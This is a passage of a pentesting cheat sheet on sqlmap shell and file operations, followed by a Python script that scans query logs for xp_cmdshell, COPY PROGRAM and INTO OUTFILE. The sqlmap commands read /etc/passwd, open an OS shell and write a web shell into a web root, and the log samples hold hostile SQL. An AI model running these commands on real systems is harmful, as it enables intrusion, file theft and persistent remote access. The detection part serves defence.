
Shells & Files

# Check for DBA privs
sqlmap -r req.txt --is-dba --batch

# SQL shell (run raw SQL) 
sqlmap -r req.txt --sql-shell --batch  

# OS shell (if sqlmap can reach RCE path via DBMS features) 
sqlmap -r req.txt --os-shell --batch  

# Read/write files (DBMS-dependent permissions required) 
sqlmap -r req.txt --file-read "/etc/passwd" --batch 

sqlmap -r req.txt --file-write shell.aspx --file-dest "C:/inetpub/wwwroot/shell.aspx" --batch

Notes: --os-shell/--file-* rely on DBMS-specific primitives (e.g., xp_cmdshell on MSSQL, COPY ... PROGRAM on Postgres, SELECT ... INTO OUTFILE on MySQL).
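
Detection side of the note above, as an added example that is not part of the original page: a scan of database query-log text for the three primitives it names (xp_cmdshell, COPY ... PROGRAM, SELECT ... INTO OUTFILE). The log layout (timestamp, user, database, query), the function names and the sample lines are constructed assumptions.

```python
import re

# Primitives named in the note, matched against normalized query text.
PRIMITIVES = {
    "mssql:xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "postgres:COPY PROGRAM": re.compile(
        r"\bCOPY\b.+?\b(?:FROM|TO)\s+PROGRAM\b", re.I),
    "mysql:INTO OUTFILE": re.compile(r"\bINTO\s+OUTFILE\b", re.I),
}

# Constructed sample log: "<timestamp> <db user> <database> <query>"
SAMPLE_LOG = """\
2024-01-01T10:00:01Z app_user shop SELECT id, name FROM products WHERE id = 7
2024-01-01T10:00:02Z app_user shop EXEC master..xp_cmdshell 'whoami'
2024-01-01T10:00:03Z app_user shop COPY t_out FROM PROGRAM 'id'
2024-01-01T10:00:04Z app_user shop SELECT 'x' INTO/**/OUTFILE '/tmp/constructed.txt'
2024-01-01T10:00:05Z backup_svc shop COPY orders TO '/backup/orders.csv'
"""


def normalize(query):
    """Replace inline /* */ comments with a space and collapse whitespace,
    so comment-as-whitespace tricks do not hide a keyword pair."""
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).strip()


def scan(log_text):
    """Return (line number, db user, primitive) for every flagged query."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # not a query record in the assumed layout
        _ts, user, _db, query = parts
        normalized = normalize(query)
        for name, pattern in PRIMITIVES.items():
            if pattern.search(normalized):
                findings.append((lineno, user, name))
    return findings


if __name__ == "__main__":
    for lineno, user, name in scan(SAMPLE_LOG):
        print(f"line {lineno}: {user} used {name}")
```

A web application's database account normally has no reason to issue any of these statements, so a hit from that account is worth an alert on its own.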